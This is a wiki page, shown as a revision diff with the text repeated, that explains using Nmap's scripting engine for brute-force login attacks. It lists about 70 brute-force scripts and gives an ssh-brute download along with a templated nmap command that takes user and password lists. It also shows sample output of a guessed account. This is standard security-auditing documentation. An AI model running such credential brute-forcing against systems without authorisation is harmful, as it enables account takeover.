Difference between revisions of "Brute-Force with NMAP"
(JPDoe moved page Brute-Force with NMAP to Delete 1: No rights to delete) Tag: New redirect |
(Removed redirect to Delete 1) Tag: Removed redirect |
||
Line 1: | Line 1: | ||
# | == Summary == | ||
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Nmap can be also used for simple online attacks, by using the '''-script''' parameter with the desired script like '''telnet-brute.nse''' while passing the corresponding values for '''userdb''' and '''passdb''' with the additional '''-script-args''' parameter. | |||
== Requirements == | |||
=== macOS === | |||
# Homebrew: The missing packet manager for macOS (or Linux) | |||
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" | |||
# nmap | |||
brew install nmap | |||
---- | |||
=== Linux === | |||
# CentOS | |||
yum install nmap | |||
# Debian | |||
apt-get install nmap | |||
# Ubuntu | |||
sudo apt install nmap | |||
== Description == | |||
The Nmap Scripting Engine (NSE) allows users to write and share simple scripts using the Lua programming language to automate a variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency expected from Nmap. NSE can even be used for vulnerability exploitation. Currently defined [https://nmap.org/book/nse-usage.html#nse-categories categories] are '''auth''', '''broadcast''', '''default.discovery''', '''dos''', '''exploit''', '''external''', '''fuzzer''', '''intrusive''', '''malware''', '''safe''', '''version''', and '''vuln'''. | |||
List all available nmap brute-force scripts online (''70 Results: 28. November 2019''): | |||
curl https://svn.nmap.org/nmap/scripts/ 2>/dev/null | grep brute | cut -d '"' -f2 | sort | |||
afp-brute.nse irc-brute.nse pgsql-brute.nse | |||
ajp-brute.nse irc-sasl-brute.nse pop3-brute.nse | |||
backorifice-brute.nse iscsi-brute.nse redis-brute.nse | |||
cassandra-brute.nse ldap-brute.nse rexec-brute.nse | |||
cics-user-brute.nse membase-brute.nse rlogin-brute.nse | |||
citrix-brute-xml.nse metasploit-msgrpc-brute.nse rpcap-brute.nse | |||
cvs-brute-repository.nse metasploit-xmlrpc-brute.nse rsync-brute.nse | |||
cvs-brute.nse mikrotik-routeros-brute.nse rtsp-url-brute.nse | |||
deluge-rpc-brute.nse mmouse-brute.nse sip-brute.nse | |||
dicom-brute.nse mongodb-brute.nse smb-brute.nse | |||
dns-brute.nse ms-sql-brute.nse smtp-brute.nse | |||
domcon-brute.nse mysql-brute.nse snmp-brute.nse | |||
dpap-brute.nse nessus-brute.nse socks-brute.nse | |||
drda-brute.nse nessus-xmlrpc-brute.nse ssh-brute.nse | |||
ftp-brute.nse netbus-brute.nse svn-brute.nse | |||
http-brute.nse nexpose-brute.nse telnet-brute.nse | |||
http-form-brute.nse nje-node-brute.nse tso-brute.nse | |||
http-iis-short-name-brute.nse nje-pass-brute.nse vmauthd-brute.nse | |||
http-joomla-brute.nse nping-brute.nse vnc-brute.nse | |||
http-proxy-brute.nse omp2-brute.nse xmpp-brute.nse | |||
http-wordpress-brute.nse openvas-otp-brute.nse | |||
iax2-brute.nse oracle-brute-stealth.nse | |||
imap-brute.nse oracle-brute.nse | |||
informix-brute.nse oracle-sid-brute.nse | |||
ipmi-brute.nse. pcanywhere-brute.nse | |||
Download SSH-brute script: | |||
wget https://svn.nmap.org/nmap/scripts/ssh-brute.nse | |||
Example usage and results (.nse can be omitted for scripts on execution and the standard nmap -T flag is used to set aggressiveness): | |||
nmap -p '''$PORT''' -A --script '''$SCRIPT''' --script-args userdb='''$USER_LIST''',passdb='''$PASS_LIST''' '''$TARGET''' | |||
-- @output | |||
-- 22/ssh open ssh | |||
-- | ssh-brute: | |||
-- | Accounts | |||
-- | username:password | |||
-- | Statistics | |||
-- |_ Performed 32 guesses in 25 seconds. | |||
-- | |||
-- @args ssh-brute.timeout Connection timeout (default: "5s") | |||
== Additional Information == | |||
=== macOS === | |||
Default user and password lists: | |||
/usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/nselib/data/user.lst | |||
/usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/nselib/data/pass.lst | |||
View available scripts: | |||
ls -al /usr/local/Cellar/nmap/'''$NMAP_VERSION'''/share/nmap/scripts/ | |||
---- | |||
=== Linux === | |||
Default nmap home: | |||
/usr/share/nmap/ | |||
Find all available namp scripts if any: | |||
find / -name *.nse 2>/dev/null | |||
Find default nmap files if any: | |||
find / -type f \( -name "ssh-brute.nse" -o -name "pass.lst" -o -name "user.lst" \) 2>/dev/null | |||
== Used Hardware == | |||
[[MacBook Pro (15-inch, 2017), macOS 10.14, 2,8GHz Intel Core i7, 16GB LPDDR3]] | |||
== References == | |||
* https://brew.sh | |||
* https://www.lua.org/ | |||
* https://nmap.org/nsedoc/scripts/ | |||
* https://nmap.org/nsedoc/scripts/ssh-brute.html | |||
* https://nmap.org/nsedoc/lib/unpwdb.html#script-args | |||
* https://nmap.org/book/nse-usage.html#nse-categories | |||
* https://nmap.org/book/man-nse.html | |||
* https://svn.nmap.org/nmap/scripts/ | |||
[[Category:Documentation]] |
Revision as of 12:03, 6 February 2020
Summary
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Nmap can be also used for simple online attacks, by using the -script parameter with the desired script like telnet-brute.nse while passing the corresponding values for userdb and passdb with the additional -script-args parameter.
Requirements
macOS
# Homebrew: The missing packet manager for macOS (or Linux) /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
# nmap brew install nmap
Linux
# CentOS yum install nmap
# Debian apt-get install nmap
# Ubuntu sudo apt install nmap
Description
The Nmap Scripting Engine (NSE) allows users to write and share simple scripts using the Lua programming language to automate a variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency expected from Nmap. NSE can even be used for vulnerability exploitation. Currently defined categories are auth, broadcast, default.discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln.
List all available nmap brute-force scripts online (70 Results: 28. November 2019):
curl https://svn.nmap.org/nmap/scripts/ 2>/dev/null | grep brute | cut -d '"' -f2 | sort
afp-brute.nse irc-brute.nse pgsql-brute.nse ajp-brute.nse irc-sasl-brute.nse pop3-brute.nse backorifice-brute.nse iscsi-brute.nse redis-brute.nse cassandra-brute.nse ldap-brute.nse rexec-brute.nse cics-user-brute.nse membase-brute.nse rlogin-brute.nse citrix-brute-xml.nse metasploit-msgrpc-brute.nse rpcap-brute.nse cvs-brute-repository.nse metasploit-xmlrpc-brute.nse rsync-brute.nse cvs-brute.nse mikrotik-routeros-brute.nse rtsp-url-brute.nse deluge-rpc-brute.nse mmouse-brute.nse sip-brute.nse dicom-brute.nse mongodb-brute.nse smb-brute.nse dns-brute.nse ms-sql-brute.nse smtp-brute.nse domcon-brute.nse mysql-brute.nse snmp-brute.nse dpap-brute.nse nessus-brute.nse socks-brute.nse drda-brute.nse nessus-xmlrpc-brute.nse ssh-brute.nse ftp-brute.nse netbus-brute.nse svn-brute.nse http-brute.nse nexpose-brute.nse telnet-brute.nse http-form-brute.nse nje-node-brute.nse tso-brute.nse http-iis-short-name-brute.nse nje-pass-brute.nse vmauthd-brute.nse http-joomla-brute.nse nping-brute.nse vnc-brute.nse http-proxy-brute.nse omp2-brute.nse xmpp-brute.nse http-wordpress-brute.nse openvas-otp-brute.nse iax2-brute.nse oracle-brute-stealth.nse imap-brute.nse oracle-brute.nse informix-brute.nse oracle-sid-brute.nse ipmi-brute.nse. pcanywhere-brute.nse
Download SSH-brute script:
wget https://svn.nmap.org/nmap/scripts/ssh-brute.nse
Example usage and results (.nse can be omitted for scripts on execution and the standard nmap -T flag is used to set aggressiveness):
nmap -p $PORT -A --script $SCRIPT --script-args userdb=$USER_LIST,passdb=$PASS_LIST $TARGET -- @output -- 22/ssh open ssh -- | ssh-brute: -- | Accounts -- | username:password -- | Statistics -- |_ Performed 32 guesses in 25 seconds. -- -- @args ssh-brute.timeout Connection timeout (default: "5s")
Additional Information
macOS
Default user and password lists:
/usr/local/Cellar/nmap/$NMAP_VERSION/share/nmap/nselib/data/user.lst /usr/local/Cellar/nmap/$NMAP_VERSION/share/nmap/nselib/data/pass.lst
View available scripts:
ls -al /usr/local/Cellar/nmap/$NMAP_VERSION/share/nmap/scripts/
Linux
Default nmap home:
/usr/share/nmap/
Find all available namp scripts if any:
find / -name *.nse 2>/dev/null
Find default nmap files if any:
find / -type f \( -name "ssh-brute.nse" -o -name "pass.lst" -o -name "user.lst" \) 2>/dev/null
Used Hardware
MacBook Pro (15-inch, 2017), macOS 10.14, 2,8GHz Intel Core i7, 16GB LPDDR3